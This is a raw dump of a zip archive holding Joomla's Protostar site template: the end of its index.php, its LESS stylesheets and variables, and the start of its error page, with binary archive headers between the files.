		</div>
	</div>
	<!-- Footer -->
	<footer class="footer" role="contentinfo">
		<div class="container<?php echo ($params->get('fluidContainer') ? '-fluid' : ''); ?>">
			<hr />
			<jdoc:include type="modules" name="footer" style="none" />
			<p class="pull-right">
				<a href="#top" id="back-top">
					<?php echo JText::_('TPL_PROTOSTAR_BACKTOTOP'); ?>
				</a>
			</p>
			<p>
				&copy; <?php echo date('Y'); ?> <?php echo $sitename; ?>
			</p>
		</div>
	</footer>
	<jdoc:include type="modules" name="debug" style="none" />
</body>
</html>
PK՜�\.��T��protostar/less/icomoon.lessnu�[���@font-face {
	font-family: 'IcoMoon';
	src: url('../../../media/jui/fonts/IcoMoon.eot');
	src: url('../../../media/jui/fonts/IcoMoon.eot?#iefix') format('embedded-opentype'),
	url('../../../media/jui/fonts/IcoMoon.woff') format('woff'),
	url('../../../media/jui/fonts/IcoMoon.ttf') format('truetype'),
	url('../../../media/jui/fonts/IcoMoon.svg#IcoMoon') format('svg');
	font-weight: normal;
	font-style: normal;
}
@import "../../../media/jui/less/icomoon.less";
PK՜�\�AqG protostar/less/template_rtl.lessnu�[���// Specific RTL. rtl class is added to body tag

// Fix for sub menu alignment
.rtl .navigation .nav-child {
	left: auto;
	right:0;
}
.rtl .navigation .nav > li > .nav-child:before {
	left: auto;
	right:12px;
}
.rtl .navigation .nav > li > .nav-child:after {
	left: auto;
	right:13px;
}

// Category collapse
.rtl .categories-list .collapse {
	margin: 0 20px 0 0;
}

// Modal footer
.rtl .modal-footer button {
	float: left;
}

// Smart search select field margin
.rtl .finder-selects {
    margin: 0 0 15px 15px;
}PK՜�\>+�!<!<protostar/less/template.lessnu�[���// CSS Reset
@import "../../../media/jui/less/reset.less";

// Core variables and mixins
@import "variables.less"; // Custom for this template
@import "../../../media/jui/less/mixins.less";

// Grid system and page structure
@import "../../../media/jui/less/scaffolding.less";
@import "../../../media/jui/less/grid.less";
@import "../../../media/jui/less/layouts.less";

// Base CSS
@import "../../../media/jui/less/type.less";
@import "../../../media/jui/less/code.less";
@import "../../../media/jui/less/forms.less";
@import "../../../media/jui/less/tables.less";

// Components: common
// @import "../../../media/jui/less/sprites.less";
@import "../../../media/jui/less/dropdowns.less";
@import "../../../media/jui/less/wells.less";
@import "../../../media/jui/less/component-animations.less";
@import "../../../media/jui/less/close.less";

// Components: Buttons & Alerts
@import "../../../media/jui/less/buttons.less";
@import "../../../media/jui/less/button-groups.less";
@import "../../../media/jui/less/alerts.less"; // Note: alerts share common CSS with buttons and thus have styles in buttons.less

// Components: Nav
@import "../../../media/jui/less/navs.less";
@import "../../../media/jui/less/navbar.less";
@import "../../../media/jui/less/breadcrumbs.less";
@import "../../../media/jui/less/pagination.less";
@import "../../../media/jui/less/pager.less";

// Components: Popovers
@import "../../../media/jui/less/modals.less";
@import "../../../media/jui/less/tooltip.less";
@import "../../../media/jui/less/popovers.less";

// Components: Misc
@import "../../../media/jui/less/thumbnails.less";
@import "../../../media/jui/less/labels-badges.less";
@import "../../../media/jui/less/progress-bars.less";
@import "../../../media/jui/less/accordion.less";
@import "../../../media/jui/less/carousel.less";
@import "../../../media/jui/less/hero-unit.less";

// Utility classes
@import "../../../media/jui/less/utilities.less";

// RESPONSIVE CLASSES
// ------------------

@import "../../../media/jui/less/responsive-utilities.less";


// MEDIA QUERIES
// ------------------

// Phones to portrait tablets and narrow desktops
@import "../../../media/jui/less/responsive-767px-max.less";

// Tablets to regular desktops
@import "../../../media/jui/less/responsive-768px-979px.less";

// Large desktops
@import "../../../media/jui/less/responsive-1200px-min.less";


// RESPONSIVE NAVBAR
// ------------------

// From 979px and below, show a button to toggle navbar contents
@import "../../../media/jui/less/responsive-navbar.less";

// Extended for JUI
@import "../../../media/jui/less/bootstrap-extended.less"; // Has to be last to override when necessary
// div.modal (instead of .modal)
@import "../../../media/jui/less/modals.joomla.less";
@import "../../../media/jui/less/responsive-767px-max.joomla.less";

// Icon Font
@import "icomoon.less";

/* Site Body Styles */
body {
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}
body.site{
	border-top:3px solid #0088cc;
	padding: 20px;
	background-color: #f4f6f7;
}
body.site.fluid{
	background-color: #ffffff;
}
.thumbnail {
	margin-bottom:9px;
}
.accordion-group {
	background:#fff;
}
/* Site Title (if no logo) */
.site-title {
	font-size: 40px;
	font-size: calc(~"16px + 2.16vw");
	line-height: 48px;
	font-weight: bold;
}
@media (min-width: 1024px) {
	.site-title {
		font-size: 40px;
	}
}
.brand {
	color: darken(@linkColor, 20%);
	.transition(color .5s linear);
}
.brand:hover {
	color: @linkColor;
	text-decoration: none;
}
/* Header */
.header{
	margin-bottom: 10px;
}
.header .finder {
	margin-top: 14px;
}
.header .finder .btn{
	margin-top: 0px;
}
/* Nav */
.navigation{
	padding: 5px 0;
	border-top: 1px solid rgba(0, 0, 0, 0.075);
	border-bottom: 1px solid rgba(0, 0, 0, 0.075);
	margin-bottom: 10px;
}
.navigation .nav-pills{
	margin-bottom: 0;
}
/* Hero Banner Unit */
.hero-unit{
	background-color: #08C;
}
.hero-unit > *{
	color: white;
	text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.5);
}
/* Container */
.container{
	max-width: 960px;
}
.body .container{
	background-color: #fff;
	-moz-border-radius: 4px;
	-webkit-border-radius: 4px;
	border-radius: 4px;
	padding: 20px;
	border: 1px solid rgba(0, 0, 0, 0.15);
	-moz-box-shadow: 0px 0px 6px rgba(0, 0, 0, 0.05);
	-webkit-box-shadow: 0px 0px 6px rgba(0, 0, 0, 0.05);
	box-shadow: 0px 0px 6px rgba(0, 0, 0, 0.05);
}
/* Wells */
.well .page-header{
	margin: 0px 0px 5px 0px;
}
/* Headings */

h1, h2, h3, h4, h5, h6 {
  	margin: (@baseLineHeight / 1.5) 0;
	word-wrap: break-word;
}
h1 { font-size: 26px; line-height: 28px; }
h2 { font-size: 22px; line-height: 24px; }
h3 { font-size: 18px; line-height: 20px; }
h4 { font-size: 14px; line-height: 16px; }
h5 { font-size: 13px; line-height: 15px; }
h6 { font-size: 12px; line-height: 14px; }
/* Module */
.module-header {
	padding-bottom: 17px;
	margin: 20px 0 18px 0;
	border-bottom: 1px solid #eeeeee;
}
/* Single Item */
p {
	word-wrap: break-word;
}
.item-title {
	margin-bottom:9px;
}
.item-content {
	margin:18px 0;
}
.item-subtitle {
	margin-bottom:9px;
}
.pull-right.item-image {
	margin:0 0 18px 20px;
}
.pull-left.item-image {
	margin:0 20px 18px 0;
}
.header .nav > li:last-child > .dropdown-menu,
.item-actions .dropdown-menu,
.item-comment .dropdown-menu {
	left:initial;
	right:0;
}
.article-index {
	margin:0 0 10px 10px;
}
/* List */
.list-item-title {
	margin-bottom:9px;
}
.list-item-content {
	margin:18px 0;
}
.list-item-subtitle {
	margin-bottom:9px;
}
/* More Items */
.items-more,
.content-links {
	padding: 15px 0;
}
/* Breadcrumbs */
.breadcrumb {
	margin: 10px 0;
}
.breadcrumb > li,
.breadcrumb > .active {
   color: #515151;
}
/* mod_login */
#login-form {
	margin-top: 8px;
}
.add-on {
	+ #modlgn-username, + #modlgn-passwd {
		width: 132px;
	}
}
/* Caption fixes */
.img_caption .left {
	float: left;
	margin-right: 1em;
}

.img_caption .right {
	float: right;
	margin-left: 1em;
}

.img_caption .left p {
	clear: left;
	text-align: center;
}

.img_caption .right p {
	clear: right;
	text-align: center;
}

.img_caption  {
	text-align: center!important;
}

.img_caption.none {
	margin-left:auto;
	margin-right:auto;
}
/* New captions */
figure {
	display: table;
}
figure.pull-center,
img.pull-center {
	margin-left: auto;
	margin-right: auto;
}
figcaption {
	display: table-caption;
	caption-side: bottom;
}
/* Aside Subnavs */
#aside .nav .nav-child {
	border-left: 2px solid @tableBorder;
	padding-left: 5px;
}
/* Navigation Submenus */
// The dropdown menu (ul)
// ----------------------
.navigation {
	.nav-child {
		position: absolute;
		top: 95%;
		left: 0;
		z-index: @zindexDropdown;
		display: none; // none by default, but block on "open" of the menu
		float: left;
		min-width: 160px;
		padding: 5px 0;
		margin: 2px 0 0; // override default ul
		list-style: none;
		background-color: @dropdownBackground;
		border: 1px solid #ccc; // Fallback for IE7-8
		border: 1px solid @dropdownBorder;
		*border-right-width: 2px;
		*border-bottom-width: 2px;
		.border-radius(6px);
		.box-shadow(0 5px 10px rgba(0,0,0,.2));
		-webkit-background-clip: padding-box;
		 -moz-background-clip: padding;
		      background-clip: padding-box;

		// Aligns the dropdown menu to right
		&.pull-right {
			right: 0;
			left: auto;
		}

		// Dividers (basically an hr) within the dropdown
		.divider {
			.nav-divider(@dropdownDividerTop, @dropdownDividerBottom);
		}

		// Links within the dropdown menu
		a {
			display: block;
			padding: 3px 20px;
			clear: both;
			font-size: @baseFontSize;
			font-weight: normal;
			line-height: @baseLineHeight;
			color: @dropdownLinkColor;
			white-space: nowrap;
		}
	}
	.nav li {
		position: relative;
	}
	.nav > li:hover > .nav-child,
	.nav > li > a:focus + .nav-child,
	.nav li li:hover > .nav-child,
	.nav li li > a:focus + .nav-child {
		display: block;
	}
	.nav > li {
		&:before {
		  position: absolute;
		  top: 100%;
		  right: 0;
		  left: 0;
		  height: 6px;
		  content: '';
		}
	}
	.nav > li > .nav-child {
		&:before {
		  position: absolute;
		  top: -7px;
		  left: 9px;
		  display: inline-block;
		  border-right: 7px solid transparent;
		  border-bottom: 7px solid #ccc;
		  border-left: 7px solid transparent;
		  border-bottom-color: rgba(0, 0, 0, 0.2);
		  content: '';
		}
		&:after {
		  position: absolute;
		  top: -6px;
		  left: 10px;
		  display: inline-block;
		  border-right: 6px solid transparent;
		  border-bottom: 6px solid #ffffff;
		  border-left: 6px solid transparent;
		  content: '';
		}
	}
	.nav li li .nav-child {
		top: -8px;
		left: 100%;

		&:before {
			position: absolute;
			top: 9px;
			left: -7px;
			display: inline-block;
			border-top: 7px solid transparent;
			border-right: 7px solid rgba(0, 0, 0, 0.2);
			border-bottom: 7px solid transparent;
			content: '';
		}
		&:after {
			position: absolute;
			top: 10px;
			left: -6px;
			display: inline-block;
			border-top: 6px solid transparent;
			border-right: 6px solid #ffffff;
			border-bottom: 6px solid transparent;
			content: '';
		}
	}
}

// Hover state
// -----------
.navigation .nav-child li > a:hover,
.navigation .nav-child li > a:focus,
.navigation .nav-child:hover > a {
  text-decoration: none;
  color: @dropdownLinkColorHover;
  background-color: @dropdownLinkBackgroundHover;
  #gradient > .vertical(@dropdownLinkBackgroundHover, darken(@dropdownLinkBackgroundHover, 5%));
}

// Category collapse
.categories-list .collapse {
	margin-left: 20px;
}
@media (max-width: 480px) {
	.item-info > span {
		display:block;
	}
	.blog-item .pull-right.item-image {
		margin:0 0 18px 0;
	}
	.blog-item .pull-left.item-image {
		margin:0 0 18px 0;
		float:none;
	}
}
@media (max-width: 768px) {
  /* Fix ios scrolling inside boottrap modals */
	body {
		-webkit-overflow-scrolling: touch;
		padding-top: 0;
	}
	.header {
		background:transparent;
	}
	.header .brand {
		float:none;
		display:block;
		text-align:center;
	}
	.header .nav.pull-right,
	.header-search {
		float:none;
		display:block;
	}
	.header-search form {
		margin: 0;
	}
	.header-search .search-query {
		width: 90%;
	}
	.header .nav-pills > li > a {
		border: 1px solid @tableBorder;
		border-bottom:0;
		margin:0;
		-webkit-border-radius: 0;
		-moz-border-radius: 0;
		border-radius: 0;
		margin-right: 0;
	}
	.header .nav-pills > li:first-child > a {
		-webkit-border-radius: 4px 4px 0 0;
		-moz-border-radius: 4px 4px 0 0;
		border-radius: 4px 4px 0 0;
	}
	.header .nav-pills > li:last-child > a {
		-webkit-border-radius: 0 0 4px 4px;
		-moz-border-radius: 0 0 4px 4px;
		border-radius: 0 0 4px 4px;
		border-bottom:1px solid @tableBorder;
	}
	.modal.fade {
		top:-100%;
	}
	.nav-tabs {
		border-bottom: 0;
	}
	.nav-tabs > li {
		float: none;
	}
	.nav-tabs > li > a {
		border: 1px solid @tableBorder;
		-webkit-border-radius: 0;
		-moz-border-radius: 0;
		border-radius: 0;
		margin-right: 0;
	}
	.nav-tabs > li:first-child > a {
		-webkit-border-radius: 4px 4px 0 0;
		-moz-border-radius: 4px 4px 0 0;
		border-radius: 4px 4px 0 0;
	}
	.nav-tabs > li:last-child > a, .nav-tabs > .active:last-child > a {
		-webkit-border-radius: 0 0 4px 4px;
		-moz-border-radius: 0 0 4px 4px;
		border-radius: 0 0 4px 4px;
		border-bottom:1px solid @tableBorder;
	}
	.nav-tabs > li > a:hover {
		border-color: @tableBorder;
		z-index: 2;
	}
	.nav-tabs.nav-dark > li > a {
		border: 1px solid @grayDark;
	}
	.nav-tabs > li:last-child > a, .nav-tabs > .active:last-child > a {
		border-bottom:1px solid @grayDark;
	}
	.nav-tabs.nav-dark > li > a:hover {
		border-color: @grayDark;
	}
	.nav-pills > li {
		float: none;
	}
	.nav-pills > li > a {
		margin-right: 0;
	}
	.nav-pills > li > a {
		margin-bottom: 3px;
	}
	.nav-pills  > li:last-child > a {
		margin-bottom: 1px;
	}
	.form-search > .pull-left,
	.form-search > .pull-right {
		float:none;
		display:block;
		margin-bottom:9px;
	}
}
@media (max-width: 980px) {
	.navbar-fixed-top {
		margin-bottom:0!important;
	}
	.item-comment .item-image{
		display:none;
	}
	.well {
		padding: 10px;
	}
}
@media (max-width: 979px) {
	.nav-collapse.in.collapse {
		overflow: visible;
		height: 0;
		z-index: 100;
	}
	.nav-collapse .nav > li.active > a {
		color: #fff;
	}
	.nav-collapse .nav > li.active > a:hover {
		color: #555;
	}
}
@media (min-width: 768px) and (max-width: 979px) {
	#login-form .input-small {
		width: 62px;
	}
}
// Page break
dl.tabs {
	float: left;
	margin-bottom: -1px;
}
dl.tabs dt.tabs {
	float: left;
	margin-left: 3px;
	padding: 4px 10px;
	background-color: #F0F0F0;
	border-top: 1px solid #CCC;
	border-left: 1px solid #CCC;
	border-right: 1px solid #CCC;
}
dl.tabs dt:hover {
	background-color: #F9F9F9;
}
dl.tabs dt.open {
	background-color: #FFF;
	border-bottom: 1px solid #FFF;
}
dl.tabs dt.tabs h3 {
	margin: 0;
	font-size: 1.1em;
	font-weight: normal;
}
dl.tabs dt.tabs h3 a {
	color: #0088CC;
}
dl.tabs dt.tabs h3 a:hover {
	color: #005580;
	text-decoration: none;
}
dl.tabs dt.open h3 a {
	color: #000;
	text-decoration: none;
}
div.current dd.tabs {
	margin: 0;
	padding: 10px;
	clear: both;
	border: 1px solid #CCC;
	background-color: #FFF;
}

/*Print pop-up*/
#pop-print {
	float: right;
	margin: 10px;
}

/*Code white space*/
code {
	white-space: pre-wrap;
}

/*Search filter*/
#filter-search {
	vertical-align: top;
}

/*Fix for editor buttons having a stupid height*/
.editor {
	overflow: hidden;
	position: relative;
}

/* Com_search highlighting */
.search span.highlight {
	background-color:#FFFFCC;
	font-weight:bold;
	padding:1px 0;
}

/* Com_search break long titles & text */
dt.result-title {
	word-wrap: break-word;
}

dd.result-text {
	word-wrap: break-word;
}

/* Prevent scrolling on the parent window of a modal */
body.modal-open {
  overflow: hidden;
  -ms-overflow-style: none;
}

/* Align fields for the profile display */
#users-profile-custom label {
	display: inline;
}

/* Remove unneeded space between label and field in vertical forms */
.controls > .radio:first-child,
.controls > .checkbox:first-child {
	padding-top: 0;

	.form-horizontal & {
		padding-top: 5px;
	}
}

/* Align btn-group to label */
.form-horizontal .controls > .radio.btn-group:first-child {
	padding-top: 0;
}

/* Corrects the modals padding */
.field-media-wrapper .modal .modal-body {
	padding: 5px 10px;
	overflow: hidden;
}
/* Getting rid of scroll bar in smartsearch Advanced search */
#search-results {
	clear: both;
}
#finder-filter-window {
	overflow: visible;
}
#finder-search .in.collapse {
	overflow: visible;
}

/* Fix for select element overflow on browser resizing */
.well {
	select,
	.chzn-container {
		max-width: 100%;
	}
}

/* Component pop-up */
.container-popup {
	padding: 28px 10px 10px 10px;
}
li {
	word-wrap: break-word;
}

ul.manager .height-50 .icon-folder-2 {
    height: 35px;
    width: 35px;
    line-height: 35px;
    font-size: 30px;
}
/* Popover minimum height - overwrite bootstrap default */
.popover-content {
    min-height: 33px;
}

/* Smart search select field margin */
.finder-selects {
    margin: 0 15px 15px 0;
}

/* mod_search in position-0 */
.header-search .mod-languages ul {
    margin: 0 0 5px 0;
}

/* versions button radius */
.btn-group > .versions{
    .border-top-right-radius(@baseBorderRadius);
    .border-bottom-right-radius(@baseBorderRadius);
    .border-top-left-radius(@baseBorderRadius);
    .border-bottom-left-radius(@baseBorderRadius);
}

@import "template_rtl.less"; // Specific for rtl. Always load last.
PK՜�\A��_#_#protostar/less/variables.lessnu�[���//
// Variables
// --------------------------------------------------


// Global values
// --------------------------------------------------


// Grays
// -------------------------
@black:                 #000;
@grayDarker:            #222;
@grayDark:              #333;
@gray:                  #555;
@grayLight:             #999;
@grayLighter:           #eee;
@white:                 #fff;


// Accent colors
// -------------------------
@blue:                  #049cdb;
@blueDark:              #0064cd;
@green:                 #46a546;
@red:                   #9d261d;
@yellow:                #ffc40d;
@orange:                #f89406;
@pink:                  #c3325f;
@purple:                #7a43b6;


// Scaffolding
// -------------------------
@bodyBackground:        @white;
@textColor:             @grayDark;


// Links
// -------------------------
@linkColor:             #005e8d;
@linkColorHover:        darken(@linkColor, 15%);


// Typography
// -------------------------
@sansFontFamily:        "Helvetica Neue", Helvetica, Arial, sans-serif;
@serifFontFamily:       Georgia, "Times New Roman", Times, serif;
@monoFontFamily:        Monaco, Menlo, Consolas, "Courier New", monospace;

// > Joomla JUI
@baseFontSize:          13px;
// < Joomla JUI
@baseFontFamily:        @sansFontFamily;
// > Joomla JUI
@baseLineHeight:        18px;
// < Joomla JUI
@altFontFamily:         @serifFontFamily;

@headingsFontFamily:    inherit; // empty to use BS default, @baseFontFamily
@headingsFontWeight:    bold;    // instead of browser default, bold
@headingsColor:         inherit; // empty to use BS default, @textColor


// Component sizing
// -------------------------
// Based on 14px font-size and 20px line-height

@fontSizeLarge:         @baseFontSize * 1.25; // ~18px
// > Joomla JUI
@fontSizeSmall:         ceil(@baseFontSize * 0.90); // ~12px
// < Joomla JUI
@fontSizeMini:          @baseFontSize * 0.75; // ~11px

@paddingLarge:          11px 19px; // 44px
@paddingSmall:          2px 10px;  // 26px
@paddingMini:           0 6px;   // 22px

@baseBorderRadius:      4px;
@borderRadiusLarge:     6px;
@borderRadiusSmall:     3px;


// Tables
// -------------------------
@tableBackground:                   transparent; // overall background-color
@tableBackgroundAccent:             #f9f9f9; // for striping
@tableBackgroundHover:              #f5f5f5; // for hover
@tableBorder:                       #ddd; // table and cell border

// Buttons
// -------------------------
@btnBackground:                     @white;
@btnBackgroundHighlight:            darken(@white, 10%);
@btnBorder:                         #bbb;

@btnPrimaryBackground:              @linkColor;
@btnPrimaryBackgroundHighlight:     spin(@btnPrimaryBackground, 20%);

@btnInfoBackground:                 #5bc0de;
@btnInfoBackgroundHighlight:        #2f96b4;

@btnSuccessBackground:              #62c462;
@btnSuccessBackgroundHighlight:     #51a351;

@btnWarningBackground:              lighten(@orange, 15%);
@btnWarningBackgroundHighlight:     @orange;

@btnDangerBackground:               #ee5f5b;
@btnDangerBackgroundHighlight:      #bd362f;

@btnInverseBackground:              #444;
@btnInverseBackgroundHighlight:     @grayDarker;


// Forms
// -------------------------
@inputBackground:               @white;
@inputBorder:                   #ccc;
@inputBorderRadius:             3px;
@inputDisabledBackground:       @grayLighter;
@formActionsBackground:         #f5f5f5;
@inputHeight:                   @baseLineHeight + 10px; // base line-height + 8px vertical padding + 2px top/bottom border


// Dropdowns
// -------------------------
@dropdownBackground:            @white;
@dropdownBorder:                rgba(0,0,0,.2);
@dropdownDividerTop:            #e5e5e5;
@dropdownDividerBottom:         @white;

@dropdownLinkColor:             @grayDark;
@dropdownLinkColorHover:        @white;
@dropdownLinkColorActive:       @dropdownLinkColor;

@dropdownLinkBackgroundHover:   @dropdownLinkBackgroundActive;
@dropdownLinkBackgroundActive:  @linkColor;



// COMPONENT VARIABLES
// --------------------------------------------------


// Z-index master list
// -------------------------
// Used for a bird's eye view of components dependent on the z-axis
// Try to avoid customizing these :)
@zindexDropdown:          1000;
@zindexTooltip:           1030;
@zindexFixedNavbar:       1030;
@zindexModalBackdrop:     1040;
@zindexModal:             1050;
@zindexPopover:           1060;

// Sprite icons path
// -------------------------
@iconSpritePath:          "../img/glyphicons-halflings.png";
@iconWhiteSpritePath:     "../img/glyphicons-halflings-white.png";


// Input placeholder text color
// -------------------------
@placeholderText:         @grayLight;


// Hr border color
// -------------------------
@hrBorder:                @grayLighter;


// Horizontal forms & lists
// -------------------------
@horizontalComponentOffset:       180px;


// Wells
// -------------------------
@wellBackground:                  #f5f5f5;


// Navbar
// -------------------------
@navbarCollapseWidth:             979px;
@navbarCollapseDesktopWidth:      @navbarCollapseWidth + 1;

@navbarHeight:                    40px;
@navbarBackgroundHighlight:       #ffffff;
@navbarBackground:                darken(@navbarBackgroundHighlight, 5%);
@navbarBorder:                    darken(@navbarBackground, 12%);

@navbarText:                      @gray;
@navbarLinkColor:                 @gray;
@navbarLinkColorHover:            @grayDark;
@navbarLinkColorActive:           @gray;
@navbarLinkBackgroundHover:       transparent;
@navbarLinkBackgroundActive:      darken(@navbarBackground, 5%);

@navbarBrandColor:                @navbarLinkColor;

// Inverted navbar
@navbarInverseBackground:                #111111;
@navbarInverseBackgroundHighlight:       #222222;
@navbarInverseBorder:                    #252525;

@navbarInverseText:                      @grayLight;
@navbarInverseLinkColor:                 @grayLight;
@navbarInverseLinkColorHover:            @white;
@navbarInverseLinkColorActive:           @navbarInverseLinkColorHover;
@navbarInverseLinkBackgroundHover:       transparent;
@navbarInverseLinkBackgroundActive:      @navbarInverseBackground;

@navbarInverseSearchBackground:          lighten(@navbarInverseBackground, 25%);
@navbarInverseSearchBackgroundFocus:     @white;
@navbarInverseSearchBorder:              @navbarInverseBackground;
@navbarInverseSearchPlaceholderColor:    #ccc;

@navbarInverseBrandColor:                @navbarInverseLinkColor;


// Pagination
// -------------------------
@paginationBackground:                #fff;
@paginationBorder:                    #ddd;
@paginationActiveBackground:          #f5f5f5;


// Hero unit
// -------------------------
@heroUnitBackground:              @grayLighter;
@heroUnitHeadingColor:            inherit;
@heroUnitLeadColor:               inherit;


// Form states and alerts
// -------------------------
@warningText:             #c09853;
@warningBackground:       #fcf8e3;
@warningBorder:           darken(spin(@warningBackground, -10), 3%);

@errorText:               #b94a48;
@errorBackground:         #f2dede;
@errorBorder:             darken(spin(@errorBackground, -10), 3%);

@successText:             #468847;
@successBackground:       #dff0d8;
@successBorder:           darken(spin(@successBackground, -10), 5%);

@infoText:                #3a87ad;
@infoBackground:          #d9edf7;
@infoBorder:              darken(spin(@infoBackground, -10), 7%);


// Tooltips and popovers
// -------------------------
@tooltipColor:            #fff;
@tooltipBackground:       #000;
@tooltipArrowWidth:       5px;
@tooltipArrowColor:       @tooltipBackground;

@popoverBackground:       #fff;
@popoverArrowWidth:       10px;
@popoverArrowColor:       #fff;
@popoverTitleBackground:  darken(@popoverBackground, 3%);

// Special enhancement for popovers
@popoverArrowOuterWidth:  @popoverArrowWidth + 1;
@popoverArrowOuterColor:  rgba(0,0,0,.25);



// GRID
// --------------------------------------------------


// Default 940px grid
// -------------------------
@gridColumns:             12;
@gridColumnWidth:         60px;
@gridGutterWidth:         20px;
@gridRowWidth:            (@gridColumns * @gridColumnWidth) + (@gridGutterWidth * (@gridColumns - 1));
// > Joomla JUI
// 1200px min
@gridColumnWidth1200:     60px;
@gridGutterWidth1200:     20px;
@gridRowWidth1200:        (@gridColumns * @gridColumnWidth) + (@gridGutterWidth * (@gridColumns - 1));

// 768px-979px
@gridColumnWidth768:      42px;
@gridGutterWidth768:      20px;
@gridRowWidth768:         (@gridColumns * @gridColumnWidth) + (@gridGutterWidth * (@gridColumns - 1));


// Fluid grid
// -------------------------
@fluidGridColumnWidth:    6.382978723%;
@fluidGridGutterWidth:    2.127659574%;

// 1200px min
@fluidGridColumnWidth1200:     6.382978723%;
@fluidGridGutterWidth1200:     2.127659574%;

// 768px-979px
@fluidGridColumnWidth768:      6.382978723%;
@fluidGridGutterWidth768:      2.127659574%;
// < Joomla JUI
PK՜�\H��n�%�%protostar/error.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentError $this */

$app  = JFactory::getApplication();
$user = JFactory::getUser();

// Getting params from template
$params = $app->getTemplate(true)->params;

// Detecting Active Variables
$option   = $app->input->getCmd('option', '');
$view     = $app->input->getCmd('view', '');
$layout   = $app->input->getCmd('layout', '');
$task     = $app->input->getCmd('task', '');
$itemid   = $app->input->getCmd('Itemid', '');
$format   = $app->input->getCmd('format', 'html');
$sitename = htmlspecialchars($app->get('sitename'), ENT_QUOTES, 'UTF-8');

// Add JavaScript Frameworks
JHtml::_('bootstrap.framework');

// Logo file or site title param
if ($params->get('logoFile'))
{
	$logo = '<img src="' . htmlspecialchars(JUri::root() . $params->get('logoFile'), ENT_QUOTES, 'UTF-8') . '" alt="' . $sitename . '" />';
}
elseif ($params->get('sitetitle'))
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . htmlspecialchars($params->get('sitetitle')) . '</span>';
}
else
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . $sitename . '</span>';
}
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta charset="utf-8" />
	<title><?php echo $this->title; ?> <?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?></title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<?php // Use of Google Font ?>
	<?php if ($params->get('googleFont')) : ?>
		<link href="https://fonts.googleapis.com/css?family=<?php echo $params->get('googleFontName'); ?>" rel="stylesheet" />
		<style>
			h1, h2, h3, h4, h5, h6, .site-title {
				font-family: '<?php echo str_replace('+', ' ', $params->get('googleFontName')); ?>', sans-serif;
			}
		</style>
	<?php endif; ?>
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/template.css" rel="stylesheet" />
	<?php if ($app->get('debug_lang', '0') == '1' || $app->get('debug', '0') == '1') : ?>
		<link href="<?php echo JUri::root(true); ?>/media/cms/css/debug.css" rel="stylesheet" />
	<?php endif; ?>
	<?php // If Right-to-Left ?>
	<?php if ($this->direction === 'rtl') : ?>
		<link href="<?php echo JUri::root(true); ?>/media/jui/css/bootstrap-rtl.css" rel="stylesheet" />
	<?php endif; ?>
	<?php if (file_exists('templates/' . $this->template . '/css/user.css')) : ?>
		<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/user.css" rel="stylesheet" />
	<?php endif; ?>
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
	<?php // Template color ?>
	<?php if ($params->get('templateColor')) : ?>
		<style>
			body.site {
				border-top: 3px solid <?php echo $params->get('templateColor'); ?>;
				background-color: <?php echo $params->get('templateBackgroundColor'); ?>
			}
			a {
				color: <?php echo $params->get('templateColor'); ?>;
			}
			.navbar-inner, .nav-list > .active > a, .nav-list > .active > a:hover, .dropdown-menu li > a:hover, .dropdown-menu .active > a, .dropdown-menu .active > a:hover, .nav-pills > .active > a, .nav-pills > .active > a:hover {
				background: <?php echo $params->get('templateColor'); ?>;
			}
			.navbar-inner {
				-moz-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);
				-webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);
				box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);
			}
		</style>
	<?php endif; ?>
	<!--[if lt IE 9]><script src="<?php echo JUri::root(true); ?>/media/jui/js/html5.js"></script><![endif]-->
</head>
<body class="site <?php echo $option
	. ' view-' . $view
	. ($layout ? ' layout-' . $layout : ' no-layout')
	. ($task ? ' task-' . $task : ' no-task')
	. ($itemid ? ' itemid-' . $itemid : '')
	. ($params->get('fluidContainer') ? ' fluid' : '')
	. ($this->direction === 'rtl' ? ' rtl' : '');
?>">
	<!-- Body -->
	<div class="body" id="top">
		<div class="container<?php echo ($params->get('fluidContainer') ? '-fluid' : ''); ?>">
			<!-- Header -->
			<header class="header" role="banner">
				<div class="header-inner clearfix">
					<a class="brand pull-left" href="<?php echo $this->baseurl; ?>/">
						<?php echo $logo; ?>
					</a>
					<?php if ($format === 'html') : ?>
						<div class="header-search pull-right">
							<?php // Display position-0 modules ?>
							<?php echo $this->loadRenderer('modules')->render('position-0', array('style' => 'none')); ?>
						</div>
					<?php endif; ?>
				</div>
			</header>
			<?php if ($format === 'html') : ?>
				<nav class="navigation" role="navigation">
					<?php // Display position-1 modules ?>
					<?php echo $this->loadRenderer('modules')->render('position-1', array('style' => 'none')); ?>
				</nav>
			<?php endif; ?>
			<!-- Banner -->
			<?php if ($format === 'html') : ?>
				<div class="banner">
					<?php echo $this->loadRenderer('modules')->render('banner', array('style' => 'xhtml')); ?>
				</div>
			<?php endif; ?>
			<div class="row-fluid">
				<main id="content" role="main" class="span12">
					<!-- Begin Content -->
					<h1 class="page-header"><?php echo JText::_('JERROR_LAYOUT_PAGE_NOT_FOUND'); ?></h1>
					<div class="well">
						<div class="row-fluid">
							<div class="span6">
